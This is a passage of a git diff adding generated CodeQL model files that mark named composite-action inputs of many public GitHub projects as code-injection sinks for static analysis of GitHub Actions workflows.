"code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testPackageType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.appType", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml new file mode 100644 index 00000000000..7d82b2d3e9e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mastodon/mastodon", "*", "inputs.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml new file mode 100644 index 00000000000..e466e17ddb4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mavlink/qgroundcontrol", "*", "inputs.aws_secret_access_key", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "inputs.aws_key_id", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "inputs.artifact_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml new file mode 100644 index 00000000000..53881157a23 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mdanalysis/mdanalysis", "*", "inputs.extra-pip-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.full-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.micromamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.mamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.extra-conda-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.isolation", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.build-docs", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.build-tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml new file mode 100644 index 00000000000..5ee6e863db6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["medic/cht-core", "*", "inputs.hostname", "code-injection", "generated"] + - ["medic/cht-core", "*", "inputs.password", "code-injection", "generated"] + - ["medic/cht-core", "*", "inputs.username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml new file mode 100644 index 00000000000..3f5a3b658c3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["medusajs/medusa", "*", "inputs.pathToSeedData", "code-injection", "generated"] + - ["medusajs/medusa", "*", "inputs.password", "code-injection", "generated"] + - ["medusajs/medusa", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml new file mode 100644 index 00000000000..f5c13431126 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metabase/metabase", "*", "inputs.organization_name", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.github_token", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.username", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.test-args", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.clojure-version", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.include-log", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.message", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.mysql", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.postgres", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.openldap", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.maildev", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.edition", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml new file mode 100644 index 00000000000..4788f44e856 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metamask/action-create-release-pr", "*", "inputs.artifacts-path", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "inputs.created-pr-status", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "inputs.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml new file mode 100644 index 00000000000..7c66229c174 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metamask/action-npm-publish", "*", "inputs.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml new file mode 100644 index 00000000000..9eb3bdcf5eb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/fluentui", "*", "inputs.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml new file mode 100644 index 00000000000..0db95acd5cd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/playwright", "*", "inputs.report_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.connection_string", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.blob_prefix", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.output_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.path", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.namePrefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml new file mode 100644 index 00000000000..785384aa207 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/wsl", "*", "inputs.comment", "code-injection", "generated"] + - ["microsoft/wsl", "*", "inputs.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml new file mode 100644 index 00000000000..24c4fb4bc70 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["milvus-io/milvus", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml new file mode 100644 index 00000000000..72575eb7368 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mlflow/mlflow", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml new file mode 100644 index 00000000000..b2b49fbba09 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["modin-project/modin", "*", "inputs.parallel", "code-injection", "generated"] + - ["modin-project/modin", "*", "inputs.runner", "code-injection", "generated"] + - ["modin-project/modin", "*", "inputs.activate-environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml new file mode 100644 index 00000000000..6755f0d773c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/addons-server", "*", "inputs.run", "code-injection", "generated"] + - ["mozilla/addons-server", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml new file mode 100644 index 00000000000..1b55ab2d549 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/bedrock", "*", "inputs.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml new file mode 100644 index 00000000000..84401828721 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/sccache", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml new file mode 100644 index 00000000000..35804a87f05 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2", "*", "inputs.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml new file mode 100644 index 00000000000..981fe0fd348 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mumble-voip/mumble", "*", "inputs.arch", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "inputs.type", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml new file mode 100644 index 00000000000..6c984a676d0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nasa/fprime", "*", "inputs.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml new file mode 100644 index 00000000000..1138d37fb5f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nats-io/nats-server", "*", "inputs.label", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "inputs.hub_password", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "inputs.hub_username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml new file mode 100644 index 00000000000..1418299b39a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nearform-actions/optic-release-automation-action", "*", "inputs.build-command", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-name", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml new file mode 100644 index 00000000000..fb67f66ce62 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nektos/act", "*", "inputs.test_input_optional", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.composite-input", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.some", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required_with_default", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_optional_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml new file mode 100644 index 00000000000..12aa48431db --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.project-name", "code-injection", "generated"] + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml new file mode 100644 index 00000000000..336af4b814b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neondatabase/neon", "*", "inputs.save_perf_report", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.real_s3_region", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.real_s3_bucket", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.run_with_real_s3", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.run_in_parallel", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.extra_params", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.test_selection", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml new file mode 100644 index 00000000000..8d2170c47e2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neovim/neovim", "*", "inputs.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml new file mode 100644 index 00000000000..854601e3dde --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nhost/nhost", "*", "inputs.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml new file mode 100644 index 00000000000..8a6074b8796 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nix-community/nixos-wsl", "*", "inputs.filename", "code-injection", "generated"] + - ["nix-community/nixos-wsl", "*", "inputs.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml new file mode 100644 index 00000000000..f305e2a37b3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml new file mode 100644 index 00000000000..042ca09efa6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nymtech/nym", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml new file mode 100644 index 00000000000..51d4903fbb1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["obsproject/obs-studio", "*", "inputs.failCondition", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.checkGlob", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.playtestBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.steamPassword", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.steamUser", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.preview", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.stableBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.betaBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.nightlyBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.tagName", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.customLink", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.customTitle", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.urlPrefix", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml new file mode 100644 index 00000000000..12dc3005260 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ocaml/dune", "*", "inputs.OCAML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.DKML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml new file mode 100644 index 00000000000..dfe3b7f4332 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oneflow-inc/oneflow", "*", "inputs.extra_flags", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.python_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.cuda_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.tmp_dir", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.dst_host", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.dst_path", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.src_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml new file mode 100644 index 00000000000..663fada6df9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.latest", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml new file mode 100644 index 00000000000..4a53345e6e5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-ruby", "*", "inputs.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml new file mode 100644 index 00000000000..0a18189242d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-watcom/open-watcom-v2", "*", "inputs.fullname", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "inputs.buildcmd", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "inputs.artifact", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml new file mode 100644 index 00000000000..93ec3ea468d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openapitools/openapi-generator", "*", "inputs.args", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "inputs.name", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "inputs.goal", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml new file mode 100644 index 00000000000..27f5af98f89 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openjdk/jdk", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml new file mode 100644 index 00000000000..125dd8324d2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opensearch-project/opensearch-net", "*", "inputs.version", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "inputs.build_script", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "inputs.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml new file mode 100644 index 00000000000..dfa24454444 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opensearch-project/security", "*", "inputs.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml new file mode 100644 index 00000000000..9469e745ffc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opentrons/opentrons", "*", "inputs.destPrefix", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.domain", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.distPath", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.project", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.python-version", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.repository_url", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.password", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml new file mode 100644 index 00000000000..6e34a2cf592 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_files_changed", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_labels_set", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.labeler_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.components_config_schema", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.components_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.component_pattern", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.ref_name", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.repository", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.commit_sha", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.pr", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "inputs.pip-cache-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml new file mode 100644 index 00000000000..4ea72b28476 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_layout", "code-injection", 